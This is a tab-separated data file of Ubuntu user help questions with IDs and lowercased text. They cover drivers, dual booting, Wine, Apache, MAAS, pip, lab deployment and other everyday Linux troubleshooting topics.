486697	software recommendations for writing a novel ?	this is my first time using ubuntu so i 'm little lost about which softwares are good in use and which are not ... i have now libreoffice and that will do for now but when my first draft is ready i 'm going to need something where i can view my text one chapter or scene at the time . that really helps me with editing . so basically what i need is something like ywriter where i can put that massive textwall from libreoffice as chpaters and scenes . i heard that i can get it work with wine or something but if there is already similar sofware designed for ubuntu , i would prefer to try that . any recommendations ?
486699	brother dcp-7065dn , ubuntu 14.04 64bit : can print to network printer but can not use the scan function	i 'm using brscan4 and can ping it using brsaneconfig4 and it finds it but i can not scan from the computer using either simple scan or xsane image scanning . both programs do n't show the scanner as being present . brother drivers downloaded and installed dpkg -l | grep brother ii brscan-skey 0.2.4-1 amd64 brother linux scanner s-key tool ii brscan4 0.4.2-1 amd64 brother scanner driver ii cupswrapperdcp7065dn 2.0.4-2 i386 brother dcp7065dn cups wrapper driver ii dcp7065dnlpr 2.1.0-1 i386 brother dcp-7065dn lpr driver ii printer-driver-ptouch 1.3-8 amd64 printer driver brother p-touch label printers if i press the scan button on the machine it tells me to `` check connection '' i 've tried everything i can on the forums to no avail . any ideas ? solved the only thing that i can think of that i had n't done was , in terminal created a scanner using brsaneconfig4 : brsaneconfig4 -a name=dcp-7065dn model=dcp7065dn ip=192.168.1.201 get the ip address by using the menu button on the printer/scanner , select network , then tcp / ip , then ip address . i spent hours trawling the forums but the scanner started working when i restarted the computer and all was well . xsane picked it up and simple scan . still ca n't use the scan button on the machine but not worried about it .
486700	wine issue - can not start fifa world ( free 2 play )	i tried to install and start fifa world on ubuntu 14.04 , wine version 1.7.19 i created 32 bit wine prefix on my ubuntu 14.04 wine 1.7.19 downloaded origin full setup ( 3db5cf0281c282d33dce939d0934c5ba ) 95,6 mb file and installed it . i was able to install origin but i could not download fifa world . http : //slexy.org/view/s21xhen75s then i had to patch origin : qt5network http : //bugs.winehq.org/show_bug.cgi ? id=31438 # attach_47911 download started after some time ( around half hour ) after the download was completed the installer got stuck and was not doing anything . http : //slexy.org/view/s217glrogj i quieted origin and started the game allover again but it did not start . http : //slexy.org/view/s20muygst5 does anyone knows how i can fix this ? ? ?
486701	what is maas exactly ?	i 'm quite a newb on this subject and this is my first attempt . i could't find much documentation about what maas is exactly . i made my own maas server and 1 node is now added and allocated . ssh works with the node etc . but now i wonder ... what can i do with these nodes ? my idea about maas was that nodes share their computing power with the cluster controller and this cluster controller is your server . ( where i can make my mysql database , apache2 webserver etc . ) edit : and then i suddenly found this : dynamically re-allocate physical resources to match workload requirements for example.. i have an server of some sort of game with 6 threads . does maas spread my workload automatically in terms of.. sending 3 threads to my node ? ( i 'm still learning and i got a lot to learn i know . and i used google but now i really need to ask some more experienced people )
486703	how to install ubuntu alongside windows 7/8	i have a pre-installed windows 7/8 then i want to install ubntu alongside that and when i try to install i have not install ubuntu alongside windows 7/8 option in installation ( it 's missing ) . how can i have or get back this option ?
486704	metin2 error in wine : create_no_appropriate_device	i have ubuntu 14.04 i played metin2 ( private server , without hack-shield ) one year ago ( had the same laptop ) , and had no problem at that time . it worked before . now pops out a window : create_no_appropriate_device i done some research and some say that there is an incompatibility problem with integrated gpu ( i have intel 945 integrated graphics ) . i updated the gpu drivers , and still have the same problem . in windows os it can be solved by doing this : https : //www.youtube.com/watch ? v=mvz4kbi-ulo if anyone had the same problem , pls help . ( and sorry for my bad english ) metin2 private server version is 1.82 .
486707	create win8.1 usb without winusb	i am in need of creating a windows 8.1 pro usb bootable . i 've tried googling for solutions and all returned winusb . upon installing winusb , these errors shows up on the cli input sudo apt-get update : w : failed to fetch http : //ppa.launchpad.net/colingille/freshlight/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/colingille/freshlight/ubuntu/dists/trusty/main/binary-i386/packages 404 not found thus , when i enter this cli input sudo apt-get install winusb , this message is shown e : unable to locate package winusb . i was wondering is there another way to install/create a windows8.1 usb bootable using ubuntu 14.04 lts with the source of the windows installer is coming from an .iso file .
486711	i lost my sidebar and header bar buttons after an error message	i left my laptop on for 30 minutes , and when i came back there was an error message . i clicked on the prompts that asked if i wanted to report the error , but after that i lost my sidebar and header bar . the only buttons left are those in my desktop . i ca n't do anything now , i ca n't even log out and shut down properly , unless i press on the power button . i can open the ones on the desktop but i ca n't minimize and exit from them . i have tried turning the laptop off and on but the problem is still there . what can i do ? i 'm using ubuntu 14.04 lts .
486714	where are wireless or internet connection logs ?	i want to go into a log file and see what happens when my wi-fi drops , then take it elsewhere ? where can i find this ?
486716	apache ant downgrade	i need apache ant 1.8 on my ubuntu 14 . but there is only one version available : $ apt-cache madison ant ant | 1.9.3-2build1 | http : //de.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages where or how can i get an older version of apache ant ?
486717	what is gnome-terminal.wrapper ?	when i run command gnome-terminal.wrapper it open terminal similar to gnome-terminal . what is gnome-terminal.wrapper ? how it differs from gnome-terminal ?
486721	how to fix ubuntu 14.04 apache pid not match ?	lately , every time i restart the server , ubuntu always gives me a warning message of apache 2 pid not match . i have to manually kill it and restart apache 2 . i then follow the guide to check if the pid file in /var/run/apache2 is same as the one in /etc/init.d/apache2/apache2.conf , but i found that there 's no file in /var/run/apache2 . i also try to follow the steps in this website which says `` check if pid file path set in /etc/init.d/apache2/apache2.conf equals apache_pid_file variable exported in /etc/init.d/apache2/envvars . '' but there 's no such directory of /etc/init.d/apache2/envvars how can i fix this ? thanks !
486722	php5 behaving oddly	i have an ubuntu server 12.04 running php5 . some of the php scripts work and others fail . for example , i can write files and use case statements , print , and echo , use the date commands . but , i cant run phpinfo ( ) ; or run the image processors fail , dumping php source into the html files . what should i do to troubleshoot this ?
486726	jobs option in qmake	i was just compiling in qmake when i recalled that make has make -j which allows you to compile on a certain number of cores . i tried qmake -j but that failed . i looked for the term `` jobs '' in the qmake man page but it did n't come up ? is there an option for core useage in qmake ?
486727	failed to load grub	i have installed ubuntu 13.04 using separate partitions with windows 8 already installed , grub did n't load so i used `` boot repair '' and did `` recommended repair '' . now while booting i get `` failed to load uefi 0000000xx.. '' and `` failed to load grub '' then it directly loads to ubuntu . my boot repair generated link is http : //paste.ubuntu.com/7685205/ thank you .
486728	wireless hotspot does not want to go off	i am running lts 14.04 i am trying to switch off the wireless hotspot i created but it keeps going on again . this stops me from connecting to any wireless network , which is frustrating . has anyone had this problem or now how to fix it ?
486729	nvidia-331 drivers hanging on hibernate ( and now boot ) with a thinkpad w520	i 'm having quite a bit of trouble trying to use my w520 thinkpad with ubuntu 12.04 lts and an external display ( vga out ) . i know many are having similar issues with this graphics card ( mine is the quadro 2000m , not 1000m ) i got it working changing the display to 'discrete ' in the bios and installing nvidia-331 . i thought everything was dandy until my computer hibernated and would n't boot back up . i had to switch the bios to display : integrated to even get back into ubuntu . does anyone know of a relatively stable solution ? i have a nice new ips panel that i 'd love to use as a second display .
486730	attempt to read or write outside of disk 'hd0 '	i installed 14.04 on my new 3 tb disk . after restart the system responded with error : attempt to read or write outside of disk 'hd0 ' . entering rescue mode ... grub rescue > when i booted with live cd the result of sudo parted -l is the following : ubuntu @ ubuntu : ~ $ sudo parted -l model : ata wdc wd3001faex-0 ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 2097kb 1049kb bios_grub 2 2097kb 2984gb 2983gb ext4 3 2984gb 3001gb 17.1gb linux-swap ( v1 ) any ideas or pointers ?
486731	get all binded ip addresses	i have configured my network card eth0 to use 3 ips , such as 192.168.1.10 , 10.0.0.10 and 192.168.0.10 . after network restart , ifconfig is showing only one ip ie , 192.168.1.10 . but i can ping between those ips . how do i get all binded ips on eth0 ?
486737	problem installing ubuntu over windows 8	i have a hp laptop and pre installed windows 8 . i download an iso of ubuntu 14.04 lts . when i installed it using wobi , it reboot , install and again reboot and it shows two option for boot 1 windows 8 , 2- ubuntu . i click on ubuntu then ubuntu start and shows an error like this `` serious error found while checking drive/ . press i for ignore , s for skip mounting , m for manual setup '' . please help me what can i do ? if i use bootable pendrive for install , it install on a partition of my pc 's hard drive .it do n't boot ? i am beginer on linux please help me
486739	docky : crash when plug/unplug power cable	docky keeps on crashing every time i plug in or unplug the ac cable . i tried solving the problem following the instructions on this website . it worked fine for the suspend crash but when i try the power cable one i get this error in the terminal ( gedit:27944 ) : gtk-warning ** : calling inhibit failed gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:27944 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files how can i solve it ?
486740	lag when copying file to removable disk	i am running lts 14.04 when i copy any file to a removable disc , the file copies perfectly but then lags for 5 minutes or so on the last mb . the file seems to be fine once copied , but i am sure what is happening is not normal . has anyone had this problem before or know how to solve it ?
486742	asking to install package when it is already installed - ubuntu 12.04	i am asked to install a package libldns-dev in order to install some software ( freeswitch ) . although it is installed already and i have already run the command updatedb but still it is asking me to install the package . in synaptic also , this package is shown as installed . how to remove this error ? error ( in 3rd line ) - > making all mod_enum make [ 3 ] : entering directory `/usr/local/src/freeswitch/src/mod/applications/mod_enum' makefile:735 : *** you must install your distros libldns-dev or ldns-devel to build mod_enum . stop . make [ 3 ] : leaving directory `/usr/local/src/freeswitch/src/mod/applications/mod_enum' make [ 2 ] : *** [ mod_enum-all ] error 1 output of apt-get install libldns-dev - > reading package lists ... done building dependency tree reading state information ... done libldns-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 56 not upgraded .
486744	how to stop window controls appearing in menu bar and apllication	i have just installed ubuntu 14.04 , when an application is maximised the windows controls appear in both the application and menu bar in unity . i have it set to just appear in the menu bar at all times . how can i stop this from happening ?
486746	ubuntu server 14 no longer gives me write access	i set up ubuntu 14 server about 4 months ago , had it running as file server using samba , now i use windows 7 to access these files and only have one username and password for my share on the file server , note i could always create , delete , write to this shared directory . now i can see all the files in the shared directory however i suddenly no longer have write , delete permissions .
486747	windows 8.1 partitions not detected while installing ubuntu 14.04	i have windows 8.1 installed on my hp pavillion m6 with three disk drives of 100gb,300gb and 200gb . there is an unallocated space of 100gb i have seperated for linux installation . when i try installing ubuntu via usb disk , the partition manager shows a 107gb partition which most probably is the c : for windows and around 642gb single partition . how to detect those partitions correctly .
486749	macbook pro temperature issues ( tlp and cpufreq used )	i recently installed the ubuntu 14.04 lts on a macbook pro , and i have noticed some overheating issues . specifically , i used indicator-sensors and psensors to monitor the temperature , and the average is approximately 55 degrees celsius . how significant is the overheating ? to try and lower the temperature , i used cpufreq , and set it to 'powersave ' mode . in addition , i have installed tlp , and during the measurements it had already been running for an hour , in ac mode . i 'd like to maximize the lifetime of my processor , which means minimizing the temperature as much as possible . are there any other packages or methods to maintain a better temperature ?
486750	how can i enable one-click open in the unity dash ?	searching in the unity dash and clicking an item gives me options such as sharing via e-mail or revealing the file in nautilus which i rarely use . i 'd rather restore the behavior of 12.04 where you could open a file with just one click . how can i enable click open in unity dash ?
486752	dual boot win 8 / ubuntu loads only win	my computer is a sony vaio notebook . i used ubuntu and win 8 with dualboot but windows somehow managed to remove the choosing of the os at startup . i think the bios is efi and secureboot was disabled already and boot repair somehow fails , i attach the error links it gives . can someone help please ? i already spent half a day to find a solution.. thanks a lot ! igor igel http : //paste.ubuntu.com/7685696/
486754	dual boot windows 8 and ubuntu 14.04 - lost ability to boot from usb	good morning , i recently set up my asus windows 8.1 laptop to be a dual boot system with ubuntu 14.04 . i have successfully created a dual boot system using grub2 as my bootloader . the problem is this : when recently trying to boot from usb to run a livecd usb linux distro , i have lost the ability to boot from usb . the option does not show up in grub2 , i have ran the `` sudo update-grub '' command in ubuntu and still the option is n't available . furthermore , when booting to the uefi screen from win8 [ advanced startup options > restart ] when going to the usual screen to boot from a usb drive ( how i installed ubuntu in the first place ) the option to boot from my usb is missing . i only see two options : ubuntu and ubuntu . now both my win 8.1 and ubuntu are working fine but i would like to resolve this issue in case i ever need to boot from usb for recovery purposes . but also i would really like to use this livecd and try out a new distro of linux and i am unable to do so . has anyone experienced this before or have any tips to restore the ability to boot from usb from either grub2 or uefi , or both ? thank you in advance ! ! ! additional info - i work in it and am pretty familiar with both linux and windows systems . as this is my first pc with uefi and not traditional bios , i am unfamiliar with this area .
486756	internal server error when logging in as admin in horizon icehouse	i am following the guide on installing icehouse on ubuntu from the openstack site and when i try to log in as admin in horizon i get internal server error and the following is part of the traceback connectionfailed at /admin/ connection to neutron failed : maximum attempts reached request method : get request url : http : //www.controller/horizon/admin/ django version : 1.6.1 exception type : connectionfailed exception value : connection to neutron failed : maximum attempts reached exception location : /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py in retry_request , line 1228 python executable : /usr/bin/python python version : 2.7.3
486757	cmake : configured compiler /usr/bin/c++ does not support thread local storage	i 'm trying to build geant4 . i got some problem on cmake that i have no idea what to do . whenever i try to build on home directory , everything works just fine . here 's the output : geo @ george-ubuntu : ~ $ cmake -dcmake_install_prefix=/home/geo/geant4/geant4.10.00.p02-install -dgeant4_install_data=on -dgeant4_build_multithreaded=on -dgeant4_use_raytracer_x11=on -dgeant4_use_opengl_x11=on -dgeant4_use_qt=on ~/geant4/geant4.10.00.p02 -- the c compiler identification is gnu 4.8.2 -- the cxx compiler identification is gnu 4.8.2 -- check for working c compiler : /usr/bin/cc -- check for working c compiler : /usr/bin/cc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- performing test have_tls -- performing test have_tls - success ... a lot of stuff here ... -- configuring done -- generating done -- build files have been written to : /home/geo however when i change it to my desired build directory , this happens : geo @ george-ubuntu : ~ $ cd geant4/geant4.10.00.p02-build/ geo @ george-ubuntu : ~/geant4/geant4.10.00.p02-build $ cmake -dcmake_install_prefix=/home/geo/geant4/geant4.10.00.p02-install -dgeant4_install_data=on -dgeant4_build_multithreaded=on -dgeant4_use_raytracer_x11=on -dgeant4_use_opengl_x11=on -dgeant4_use_qt=on ~/geant4/geant4.10.00.p02 cmake error at cmake/modules/geant4librarybuildoptions.cmake:52 ( message ) : configured compiler /usr/bin/c++ does not support thread local storage call stack ( most recent call first ) : cmakelists.txt:75 ( include ) -- configuring incomplete , errors occurred ! what can i do ?
486758	lilypond install not working	i 'm trying to install lilypond on a 32-bit system , and for some reason the sh file simply does not want to execute itself . i 'm completely new to ubuntu , so i have next to no knowledge of how anything works . but i 've looked around and tried a few things . i 've checked `` allow executing file as program '' in properties , but i do n't see any option of executing the file , only opening it with gedit or libreoffice writer . i 've tried , chmod u+x lilypond and chmod u+x lilypond-2.18.2-1.linux-x86.sh but both times it said chmod : can not access [ filename i entered ] . no such file or directory i 've seen a suggestion for something like : cd /path/to/file chmod +x filename.sh ./filename.sh but i do n't even know how to make a command line with more than one line . does anyone know what i can do ? .
486759	cryptsetup - luks vs. truecrypt	this question may already been made but i 'd like to know how secure luks / cryptsetup is compared to truecrypt . what is the advantage and what is the disadvantage ?
486769	does unattended-upgrades work in a guest account ?	i have a scenario where the only user account to be used is the guest account . there 's an admin account to be used only for maintenance . i have installed unattended-upgrades ; will it work as intended ? will it perform the upgrades on background while the guests are logged , or only if i periodically login as admin ?
486770	how to use terminator 's options ?	terminator has one option http : //linux.die.net/man/1/terminator -- working-directory=dir set the terminal 's working directory i want to open my terminator within a specific directory each time and i think this is the option to do that . but i do n't know where to change/add this setting . currently every-time i open terminator after that i need to type cd project_directory_name i want to open this automatically each time i open new terminator window or i split in same window
486771	failed to load session 'ubuntu '	i am using a macbook pro with virtual box and ubuntu 12.04 lts . when i try to enter my own session or the guests one this message appears : 'failed to load session 'ubuntu ' ' i have read your answers to other similar questions as failed to load session ''ubuntu '' after upgrade but i ca n't reproduce them because i ca n't call the terminal . by doing ctrl + alt + f1 ... 7 or ctrl + alt + t nothing happens .
486772	no launcher or dash 14.04	in ubuntu 14.04 desktop unity does n't load ; neither launcher nor dash appears . i have tried looking for solutions on the internet . several specified trying some command line commands , but nothing has worked . also , i can not open a terminal window .
486775	deployment and configuration of a small lab	tl ; dr how can i : install ubuntu on lots of pcs without burning lots of dvds and installing manually have a set of preconfigured options applied to all these pcs during ( or right after ) install automate the way i apply configuration changes to all pcs simultaneously what we need we 're migrating a school lab of a few dozen pcs from windows to ubuntu . all the pcs will have the same configuration ( i.e. , they might differ in hardware but will have exactly the same software , same user accounts , with same passwords , same system settings , same icons in same positions , etc ) . all non-maintenance users will be using the guest account . current scenario here 's what i did install ubuntu 14.04 lts on a vm . set it with an admin account , a non-admin account and a guest account . install all desired packages ( ex : java , icedtea-plugin , flashplugin-installer ) . install unattended-upgrades use the non-admin account to : configure each software to the desired behaviour ( ex : configure the firefox start page , install adblock plus and a couple addons , configure specific settings for those addons ) . set the wallpaper and the unity launcher icons and their positions . this includes a couple custom .desktop files with custom icons in ~/.icons , manually added to the launcher in specific positions . set a symbolic link to use this non-admin account as a template for the guest account ( every modification to it modifies the guest account ) . set the guest account to autologin . used remastersys ' backup option to create an .iso . for those who do n't know remastersys , the backup option creates a live session iso that behaves exactly like the desktop system , and upon install ( manual install , using ubiquity installer ) , keeps the same settings , including user accounts and files . here 's the next steps in this scenario manually install this iso in each lab computer . build a local mirror and configure each pc with the yet undefined mirror ip . ( i do n't know if it 's relevant to the question , but there will be a local ubuntu mirror ( yet to be built and have its ip defined ) , and the pcs will have only it on their sources.list file ) . problems i 'm trying to solve ( or find better alternatives ) before i even start installing ubuntu on the lab pcs , i still need the extra steps of installing it on a vm , updating mirrors , upgrading packages , installing all the needed packages , setting up user accounts , changing wallpapers , installing firefox addons , configuring these addons , then creating an .iso with those settings . then i have to burn a lot of dvds , and manually perform then install procedure for each pc lab . if there are not enough dvds , i have to wait for the install to end on another computer so i can reuse a dvd . this can take a long time . any configuration change -- anything , from changing the wallpaper , to modifying the admin account password , to installing a new package , to changing the local mirror ip , has to be made manually on each pc . besides unoptimal , this can lead to inconsistency . any updated software that performs some post-update procedure ( ex : firefox and its `` testing addon compatibility '' dialog ) will keep repeating it on every guest login , until someone logins on the guest template account and runs the software . what i have considered i have heard one can use pxe to perform `` boot installs '' or `` net installs '' , but not only i could n't find any simple guide that i could understand , it looks like you need to extract a netboot folder from a `` clean '' iso and use this to bootstrap the install ; so it seems to me that all customizations i have done would go to waste and would have to be done post-install on each pc . from what i gathered you ca n't use a live cd iso to netboot , is that right ? it also does n't solve the problem of applying a single change automatically and simultaneously to all the machines when all the systems are already installed .
486779	how can i get wireless connection	in ubuntu , on my vostro 1500 dell , i can only connect to the internet though an ethernet cord . i just installed three different drivers suggested by other questions but not understanding all the language like what is bssd when trying to get wireless ?
486782	why is my network speed to an afp share slow ?	i 've installed netatalk on my ubuntu 14.04 box to do timemachine backups to a zfs pool from my mac . this is working . however , network speed seems to max out around 11 mib/s for the transfer over ethernet . both network cards and my router can handle 100mbps and both the connection information dialog on the ubuntu side and network monitor on the osx side report that the connection on en0 ( mac ) and eth0 ( ubuntu ) is 100 mbps speedometer on ubuntu reports that eth0 is receiving data at around 11.5 mib/s on average . can this be speeded up or have i misunderstood the speed i am seeing ?
486788	problem upgrading - wants to do a partial upgrade , is this safe for my xbmc install ?	running software update gives me this : clicking partial upgrade gives me : it seems that it wants to remove ( at least some portion of ) xbmc . is this safe to do without effecting my xmbc install ? i 'm quite happy with the way that it works , but am tiring of ubuntu nagging me periodically that it can not do this update . my xbmc is 12.2 `` frodo '' .
486790	libreoffice presentation - highlight / draw during the talk	i have some slides on which i would like to highlight some aspects live during the talk . my slides will be able to be used as pdf also . ( as i 'm not using any libreoffice special abilities . ) is there a tool existing for libreoffice or a pdf viewer that would enable me to do this . or might powerpoint be able to use my libreoffice slides ?
486794	how to install wine 0.9.52 using the terminal	how do i install wine 0.9.52 ? i prefer using the ubuntu software centre alongside the terminal instead of actually downloading the files . thank you for your time .
486795	how to close my launchpad account ?	i am surfing the whole launchpad site for a close account option but i ca n't find it . the privacy policy page mention what happens with the data after close the account , but does n't mention how to do it : you can close your launchpad account and no longer be shown as a launchpad user . you will no longer receive notifications from launchpad . however , launchpad will continue to store and show information about public contributions that you have made . how can i close my launchpad account ?
486799	remove `` restart '' option from menu	when i click the gear icon to open the system menu on my pc , these options are presented : suspend restart ... shutdown ... the restart options seems redundant , because it literally does the same thing as the shutdown one - brings up the overlay menu that is focused on the shutdown shortcut . i thought this option was supposed to be already removed . in fact , it does n't exist on my laptop . how can i bring the system menu back it its normal/original state ? both computers running ubuntu 14.04 .
486804	ubuntu 14.04 lts apache 2.4 - 403 access forbidden	hey there i just made a website ( more like a file manager ) and hosted it on apache 2.4 on ubuntu 14.04 lts but i ca n't seem to access the icons folder in var/www/html/icons , what i get is a 403 access forbidden error , but when i change the name to icon from icons then only i can access the directory given that the name is icon and not icons , but when i go to a sub directory in icons folder it gives me a 404 not found error but the file exists . how do i get around this problem . thanks ! using ls -l '/var/www/html/icons ' gives drwxrwxrwx 2 roy roy 4096 jun 9 06:57 app_add_remove_programs drwxrwxrwx 2 roy roy 4096 jun 7 07:19 backup_restore drwxrwxrwx 2 roy roy 4096 jun 7 09:57 cut drwxrwxrwx 2 roy roy 4096 jun 10 07:00 empty_trash drwxrwxrwx 24 roy roy 4096 jun 13 11:35 extensions drwxrwxrwx 2 roy roy 4096 jun 7 07:55 files_copy_file drwxrwxrwx 2 roy roy 4096 jun 6 05:50 files_new_file drwxrwxrwx 2 roy roy 4096 jun 6 05:54 files_upload_file drwxrwxrwx 2 roy roy 4096 jun 6 05:55 files_web_file drwxrwxrwx 2 roy roy 4096 jun 9 13:42 folder_my_documents drwxrwxrwx 2 roy roy 4096 jun 9 09:01 folder_my_music drwxrwxrwx 2 roy roy 4096 jun 9 13:40 folder_my_pictures drwxrwxrwx 2 roy roy 4096 jun 9 13:41 folder_my_videos drwxrwxrwx 2 roy roy 4096 jun 6 04:24 folder_new drwxrwxrwx 2 roy roy 4096 jun 6 08:05 full_trash drwxrwxrwx 2 roy roy 4096 jun 6 05:25 misc_delete_database drwxrwxrwx 2 roy roy 4096 jun 7 07:11 misc_settings drwxrwxrwx 2 roy roy 4096 jun 7 08:07 notes drwxrwxrwx 2 roy roy 4096 jun 7 09:59 paste drwxrwxrwx 2 roy roy 4096 jun 6 05:46 rename drwxrwxrwx 2 roy roy 4096 jun 9 13:44 settings drwxrwxrwx 2 roy roy 4096 jun 6 05:52 upload_folder i even tried sudo chmod -r 755 /var/www/html/icons and sudo chmod -r 777 /var/www/html/icons directory structure var | - > www | - > html | - > icons | - > rename , etc , etc , etc think my folder name icons collide with icons folder in usr/share/apache2/icons output of ls -l /var/www/html -rwxrwxrwx 1 www-data www-data 1638 jun 12 09:09 clock_script.js -rwxrwxrwx 1 www-data www-data 474 jun 22 05:24 color.php drwxrwxrwx 2 www-data www-data 4096 jun 22 04:37 darsiv_clocks -rwxrwxrwx 1 www-data www-data 8038 jun 22 2014 darsiv.js -rwxrwxrwx 1 www-data www-data 388 jun 6 00:52 darsiv.php -rwxrwxrwx 1 www-data www-data 20161 jun 22 2014 directory.php -rwxrwxrwx 1 www-data www-data 6045 jun 8 15:24 dll.php -rwxrwxrwx 1 www-data www-data 4852 jun 10 16:46 dl.php -rwxrwxrwx 1 www-data www-data 400 jun 22 2014 file_extension.php -rwxrwxrwx 1 www-data www-data 3921 jun 19 12:38 file_folder_opener.php -rwxrwxrwx 1 www-data www-data 433 jun 13 04:47 functions.php -rwxrwxrwx 1 www-data www-data 561 jun 12 10:00 generalscript.js drwxrwxrwx 24 www-data www-data 4096 jun 22 09:00 icons -rwxrwxrwx 1 www-data www-data 3744 jun 9 05:59 index.php -rwxrwxrwx 1 www-data www-data 56 jun 2 16:07 index.php~ -rwxrwxrwx 1 www-data www-data 277976 nov 14 2013 jquery-1.6.4.min.js -rwxrwxrwx 1 www-data www-data 48864 may 27 23:57 jquery.mobile-1.0.min.css -rwxrwxrwx 1 www-data www-data 81904 may 27 23:57 jquery.mobile-1.0.min.js -rwxrwxrwx 1 www-data www-data 13597 jun 12 13:54 jquery.slimscroll.js -rwxrwxrwx 1 www-data www-data 450 jun 19 10:19 jquery.tshift.min.js -rwxrwxrwx 1 www-data www-data 410 jun 13 04:25 login.js -rwxrwxrwx 1 www-data www-data 1118 jun 5 07:48 login.php -rwxrwxrwx 1 www-data www-data 37128 jun 22 2014 main.php drwxrwxrwx 6 www-data www-data 4096 jun 22 04:37 music_player drwxrwxrwx 10 www-data www-data 4096 jun 22 04:25 mycomputer drwxrwxrwx 9 www-data www-data 4096 jun 22 04:24 others -rwxrwxrwx 1 www-data www-data 86 jun 10 16:18 page.php -rwxrwxrwx 1 www-data www-data 3 jun 5 05:49 password.txt -rwxrwxrwx 1 www-data www-data 2 jun 4 12:07 password.txt~ drwxrwxrwx 4 www-data www-data 4096 jun 22 04:37 pdf -rwxrwxrwx 1 www-data www-data 68 jun 15 19:52 pdf_loader.php -rwxrwxrwx 1 www-data www-data 1586 jun 17 01:05 player.html -rwxrwxrwx 1 www-data www-data 4842 jun 16 11:39 respective_file_window.php -rwxrwxrwx 1 www-data www-data 8605 jun 22 05:24 sample.php -rwxrwxrwx 1 www-data www-data 634 feb 23 08:14 script1.js -rwxrwxrwx 1 www-data www-data 20786 jun 22 11:30 style1.css -rwxrwxrwx 1 www-data www-data 11248 jun 4 11:24 style1.css~ drwxrwxrwx 2 www-data www-data 4096 jun 22 04:37 wallpaper -rwxrwxrwx 1 www-data www-data 5714 jun 19 12:01 windowfunction.js drwxrwxrwx 4 www-data www-data 4096 jun 22 04:37 window_menu -rwxrwxrwx 1 www-data www-data 1232 jun 11 15:52 windowpriority.js output of ls -la '/var/www/html/icons' drwxrwxrwx 24 www-data www-data 4096 jun 22 09:00 . drwxrwxrwx 10 www-data www-data 4096 jun 22 09:52 .. drwxrwxrwx 2 www-data www-data 4096 jun 9 06:57 app_add_remove_programs drwxrwxrwx 2 www-data www-data 4096 jun 7 07:19 backup_restore drwxrwxrwx 2 www-data www-data 4096 jun 7 09:57 cut drwxrwxrwx 2 www-data www-data 4096 jun 10 07:00 empty_trash drwxrwxrwx 24 www-data www-data 4096 jun 13 11:35 extensions drwxrwxrwx 2 www-data www-data 4096 jun 7 07:55 files_copy_file drwxrwxrwx 2 www-data www-data 4096 jun 6 05:50 files_new_file drwxrwxrwx 2 www-data www-data 4096 jun 6 05:54 files_upload_file drwxrwxrwx 2 www-data www-data 4096 jun 6 05:55 files_web_file drwxrwxrwx 2 www-data www-data 4096 jun 9 13:42 folder_my_documents drwxrwxrwx 2 www-data www-data 4096 jun 9 09:01 folder_my_music drwxrwxrwx 2 www-data www-data 4096 jun 9 13:40 folder_my_pictures drwxrwxrwx 2 www-data www-data 4096 jun 9 13:41 folder_my_videos drwxrwxrwx 2 www-data www-data 4096 jun 6 04:24 folder_new drwxrwxrwx 2 www-data www-data 4096 jun 6 08:05 full_trash drwxrwxrwx 2 www-data www-data 4096 jun 6 05:25 misc_delete_database drwxrwxrwx 2 www-data www-data 4096 jun 7 07:11 misc_settings drwxrwxrwx 2 www-data www-data 4096 jun 7 08:07 notes drwxrwxrwx 2 www-data www-data 4096 jun 7 09:59 paste drwxrwxrwx 2 www-data www-data 4096 jun 6 05:46 rename drwxrwxrwx 2 www-data www-data 4096 jun 9 13:44 settings drwxrwxrwx 2 www-data www-data 4096 jun 6 05:52 upload_folder
486805	smooth screen capturing tool for ubuntu 14.04	i want to record a clip of a football match playing on my screen . i used vlc for this task but frames are not smooth . i tried changing fps value but did n't work . is there any screen caprturing tool for ubuntu 14.04 in which i can get smooth frames just like an original video . if one can refer me any software in which i would be able to record both video and audio at the same time , that would be greater help .
486807	ssh for ubuntu touch	for some reason , while i am trying to connect to ssh on my nexus 7 2013 i keep getting this error message : permission denied ( publickey ) can someone explain how to properly setup ssh for ubuntu touch ?
486808	ubuntu 14 does n't auto-start mongodb at reboot	i have a stock install of ubuntu 14 , installed a few weeks ago . i installed mongodb with apt-get . when i run sudo service mongodb start then the service runs correctly and i can access all the mongodb goodness . however , whenever i reboot it will not start automatically . i have tried running update.rc or whatever it is called , and it claims to run successfully however still no luck . is this a known issue ? how can i diagnose it ? and i guess , most importantly , how can i make it start at reboot ?
486809	downlaod the latest version of python-pip using apt-get	ubuntu 12.04 python 2.7 apt 0.8.16~exp12ubuntu10.17 for amd64 compiled on jun 13 2014 17:42:13 when i run sudo apt-get install python-pip it installs a a very old version . $ pip -- version pip 1.0 from /usr/lib/python2.7/dist-packages ( python 2.7 ) this has caused me all sorts of problems as that version of pip has trouble locating many packages . when i try to install the latest version 1.5.6 via apt-get it wont locate it . [ $ sudo apt-get install python-pip=1.5.6 reading package lists ... done building dependency tree reading state information ... done e : version '1.5.6 ' for 'python-pip ' was not found ] [ 2 ] note : i have previously run apt-get update and apt-get update when i try to install pip by executing sudo python get-pip.py i get $ python get-pip.py downloading/unpacking pip can not fetch index base url https : //pypi.python.org/simple/ could not find any downloads that satisfy the requirement pip cleaning up ... no distributions at all found for pip storing debug log for failure in /home/user/.pip/pip.log i believe this is because of some issues with the ubunto vm proxy settings which i can get resolved later in the week . preferably i just want to install a recent version of pip via apt-get but i am open to any solution . any help is much appriciated
